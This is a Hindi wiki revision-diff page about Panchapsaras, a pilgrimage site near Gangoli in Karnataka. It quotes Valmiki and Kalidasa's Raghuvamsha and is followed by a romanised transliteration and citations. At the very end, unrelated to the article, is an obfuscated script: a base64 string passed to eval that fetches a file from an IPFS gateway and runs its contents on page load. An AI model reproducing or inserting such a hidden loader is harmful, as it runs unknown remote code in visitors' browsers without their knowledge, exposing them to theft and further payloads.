Difference between revisions of "पंचाप्सरस"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
(''''पंचाप्सरस''' का उल्लेख मंडकर्णि (या मंदकर्णि) मुनि ...' के साथ नया पन्ना बनाया)
 
 
Line 1: Line 1:
'''पंचाप्सरस''' का उल्लेख मंडकर्णि (या मंदकर्णि) [[मुनि]] के [[आश्रम]] के रूप में [[वाल्मीकि]] ने किया है-
+
'''पंचाप्सरस''' [[दक्षिण भारत]] के [[कर्नाटक|कर्नाटक राज्य]] में स्थित [[हिन्दू|हिंदुओं]] का [[तीर्थ|तीर्थ स्थल]] है। कुन्दापुर से बस द्वारा गंगोली बाज़ार आना चाहिए। गंगोली का अर्थ गंगावली- कई नदियों का संगम है। यह पुराण प्रसिद्ध पंचाप्सरस तीर्थ है; किंतु अब लुप्त प्राय है। केवल पास के लोग [[श्राद्ध]] करने यहाँ आते हैं। यहाँ कोई मंदिर नहीं है<ref>{{पुस्तक संदर्भ |पुस्तक का नाम= हिन्दूओं के तीर्थ स्थान|लेखक= सुदर्शन सिंह 'चक्र'|अनुवादक= |आलोचक= |प्रकाशक=|संकलन=|संपादन=|पृष्ठ संख्या=174|url=}}</ref>।
 +
 
 +
पंचाप्सरस का उल्लेख मंडकर्णि (या मंदकर्णि) [[मुनि]] के [[आश्रम]] के रूप में [[वाल्मीकि]] ने किया है-
 
<blockquote>'तत: कर्तुतपोविघ्नं सर्वदवैर्नियोजित: प्रधानाप्सरस: पंचविद्युच्यलितवर्चस:, इदं पंचाप्सरो नाम तड़ागं सार्वकालिक निर्मितंतपसा तेन मुनिना मंदिकर्णिना'।</blockquote>
 
<blockquote>'तत: कर्तुतपोविघ्नं सर्वदवैर्नियोजित: प्रधानाप्सरस: पंचविद्युच्यलितवर्चस:, इदं पंचाप्सरो नाम तड़ागं सार्वकालिक निर्मितंतपसा तेन मुनिना मंदिकर्णिना'।</blockquote>
  
 
*[[कालिदास]] ने [[रघुवंश महाकाव्य|रघुवंश]]<ref>[[रघुवंश महाकाव्य|रघुवंश]] 13, 38</ref> में पंचाप्सरस् सरोवर के पास शातकर्णि मुनि का आश्रम माना है-
 
*[[कालिदास]] ने [[रघुवंश महाकाव्य|रघुवंश]]<ref>[[रघुवंश महाकाव्य|रघुवंश]] 13, 38</ref> में पंचाप्सरस् सरोवर के पास शातकर्णि मुनि का आश्रम माना है-
 
<blockquote>'एतन् मुने मानिनिशातकर्णि पंचाप्सरो नाम विहारिवारि, आभाति पर्यंतनं विदुरान्मेघांतरालक्ष्य मिवेंदुबिंबम्'।</blockquote>
 
<blockquote>'एतन् मुने मानिनिशातकर्णि पंचाप्सरो नाम विहारिवारि, आभाति पर्यंतनं विदुरान्मेघांतरालक्ष्य मिवेंदुबिंबम्'।</blockquote>
*स्थानीय किंवदंती के अनुसार [[मैसूर]] राज्य में स्थित गंगावती या गंगोली का अभिज्ञान पंचाप्सरस से किया जाता है।
+
*स्थानीय किंवदंती के अनुसार मैसूर राज्य में स्थित गंगावती या गंगोली का अभिज्ञान पंचाप्सरस से किया जाता है।
 
*पंचाप्सरस पाँच नदियों का संगम स्थल है।
 
*पंचाप्सरस पाँच नदियों का संगम स्थल है।
  

Latest revision as of 05:39, 20 September 2016

panchapsaras dakshin bharat ke karnatak rajy mean sthit hianduoan ka tirth sthal hai. kundapur se bas dvara gangoli bazar ana chahie. gangoli ka arth gangavali- kee nadiyoan ka sangam hai. yah puran prasiddh panchapsaras tirth hai; kiantu ab lupt pray hai. keval pas ke log shraddh karane yahaan ate haian. yahaan koee mandir nahian hai[1].

panchapsaras ka ullekh mandakarni (ya mandakarni) muni ke ashram ke roop mean valmiki ne kiya hai-

'tat: kartutapovighnan sarvadavairniyojit: pradhanapsaras: panchavidyuchyalitavarchas:, idan panchapsaro nam t dagan sarvakalik nirmitantapasa ten munina mandikarnina'.

'etanh mune maninishatakarni panchapsaro nam viharivari, abhati paryantanan viduranmeghaantaralakshy miveandubianbamh'.

  • sthaniy kianvadanti ke anusar maisoor rajy mean sthit gangavati ya gangoli ka abhijnan panchapsaras se kiya jata hai.
  • panchapsaras paanch nadiyoan ka sangam sthal hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

aitihasik sthanavali |lekhak: vijayendr kumar mathur |prakashak: rajasthan hindi granth akadami, jayapur |prishth sankhya: 516 |

  1. hindoooan ke tirth sthan |lekhak: sudarshan sianh 'chakr' |prishth sankhya: 174 |
  2. raghuvansh 13, 38

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>